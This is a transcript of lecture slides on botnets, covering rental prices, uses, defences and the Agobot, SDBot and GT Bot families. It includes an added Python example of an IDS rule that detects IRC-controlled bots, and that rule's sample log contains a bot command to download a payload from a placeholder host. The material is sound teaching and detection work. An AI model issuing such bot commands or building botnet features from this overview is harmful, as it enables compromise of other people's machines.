Botnets: uses, prevention, and examples
TRANSCRIPT
Background
• Robot Network
• Programs communicating over a network to complete a task
• Took on a new meaning in the security world
• Network of compromised machines that can be remotely controlled
Numbers
• Typically rented
• DDoS (10K – 120K (10-100 Gbps) for $200 per day)
• Spamming (SOCKS proxy)
• Web traffic control (unique IPs)
o Page/ad views
o Likes
o Poll manipulation
Power
• Cheap supercomputers (sold, rented, or kept for use)
• Bitcoin/Dogecoin mining
o BadLepricon, distributed via Google Play
o GPU 'idle' at 180° F
o Storm Botnet (1 mil – 50 mil machines), largest at the time
Information
• May as well: the machine is already compromised
• Traffic sniffing, key loggers and other information theft
• Self-propagation
o Spreading over the network
o Detection of other botnets' presence
o The enemy of my enemy is my competitor
o Happy Hacker, Zeu$ botnet master
For the Greater Good
• What makes them bad can be used for good
o Hard to remove or disable
o Good at hiding/quiet monitoring
o Botnets with good intentions fighting botnets
• Phalanx, DDoS protection
o Nodes of the botnet used as protective mailboxes
o Pass on information when requested
o Computational puzzle to gain access
Defensive
• Treat just like malware
• Intrusion Detection System
• The main targets of botnets don't follow these:
o Keeping updated
o Quality firewall, anti-virus
o Other general security measures
o Removal, maybe a clean install
Offensive
• Agencies know people think of security last
• Research for IDS
o Development of "good" botnets
o Gun buying programs, better unused
o Tracking down botnet masters
o Examining bought/captured botnets
o Honeypots
Agobot - the multi-tool
• 500 known versions
• Easy to use, little programming knowledge required
• Simple to add commands / vulnerability scanners
• Offers rootkit capabilities (process hiding)
• If you want it, there is a version that has it
• Advanced form of traffic sniffing
o Packet sniffers / key loggers
o Self propagation
o DDoS commands
o Stripped-down libpcap DLL registered as a system driver
o Utilizes the libpcre DLL to look out for bot commands
SDBot – the cheaper multi-tool
• Written in very poor C but still widely used
• Less sophisticated, smaller instruction set
• Similar to Agobot in features
• Copies itself to all mapped drives and shared network resources
• Can update itself, which is cool
• Bad form of traffic sniffing
o Process hiding
o Self replication
o Based on Windows raw socket listening; listens to its own traffic
Global Threat Bot - DDOS tool
• Distributed as a Trojan over Internet Relay Chat (IRC) networks
• Runs in stealth mode with the name mIRC Client
• Utilizes a number of mIRC bot scripts
• Once installed joins IRC channel and waits for commands
• Useful for launching DDoS attacks over IRC networks
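As an added defender-side example (not from the original slides): a toy IDS rule over constructed IRC traffic log lines that flags a host behaving the way the GT Bot slide describes, i.e. it joins a channel, never talks itself, and only receives command-like messages. The one-message-per-line log format, the host addresses and the channel names are all constructed assumptions for the example.

```python
import re
from collections import defaultdict

# One IRC message per line: "<host> <dir> <raw IRC line>", where '>' is
# sent by the host and '<' is received. This format is an assumption for
# the example; a real deployment would feed it from a packet capture.
LINE_RE = re.compile(r"^(?P<host>\S+) (?P<dir>[<>]) (?::\S+ )?(?P<cmd>[A-Z]+) (?P<args>.*)$")

# Constructed sample. 10.0.0.5 is a person chatting; 10.0.0.9 behaves like a
# GT Bot node: joins a channel, says nothing, and only receives commands.
SAMPLE_LOG = """\
10.0.0.5 > NICK alice
10.0.0.5 > JOIN #chat
10.0.0.5 > PRIVMSG #chat :hello everyone
10.0.0.5 < :bob!b@irc PRIVMSG #chat :hi alice
10.0.0.9 > NICK [GT]x9f2
10.0.0.9 > JOIN #ctrl
10.0.0.9 < :op!o@irc PRIVMSG #ctrl :.update http://example.invalid/b.bin
10.0.0.9 < :op!o@irc PRIVMSG #ctrl :.status
10.0.0.9 < :op!o@irc PRIVMSG #ctrl :.sleep 600
"""

def parse(log):
    """Yield (host, direction, command, args) for each well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m["host"], m["dir"], m["cmd"], m["args"]

def flag_bot_like_hosts(log, min_commands=2):
    """Return {host: command_count} for hosts that joined a channel, never
    sent a PRIVMSG themselves, and received at least min_commands messages
    on a joined channel whose text starts with a bot command prefix."""
    joined = defaultdict(set)    # host -> channels it JOINed
    spoke = set()                # hosts that sent any PRIVMSG
    commands = defaultdict(int)  # host -> command-like messages received
    for host, direction, cmd, args in parse(log):
        if direction == ">" and cmd == "JOIN":
            joined[host].add(args.split()[0])
        elif direction == ">" and cmd == "PRIVMSG":
            spoke.add(host)
        elif direction == "<" and cmd == "PRIVMSG":
            target, _, text = args.partition(" :")
            if target in joined.get(host, ()) and text[:1] in (".", "!"):
                commands[host] += 1
    return {h: commands[h] for h in joined
            if h not in spoke and commands[h] >= min_commands}
```

The rule is purely behavioural (silent member of a channel receiving prefixed commands), so it does not depend on knowing a particular bot family's command vocabulary, and the threshold keeps a single stray message from raising an alert.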
Review
• Botnets are malware with control (NO ZOMBIES)
• Numbers, Power, Information and maybe good uses
• Offensive and Defensive prevention
• 3 common examples
Links
• http://www.wired.co.uk/news/archive/2013-05/16/internet-census
• https://www.youtube.com/watch?v=2GdqoQJa6r4 - How to Steal a Botnet
• https://www.youtube.com/watch?v=A5-ewv3zvrM - How to Make a Botnet
• https://blog.damballa.com/archives/330 - DDoS pricing
• The good stuff is just a search away, but be wary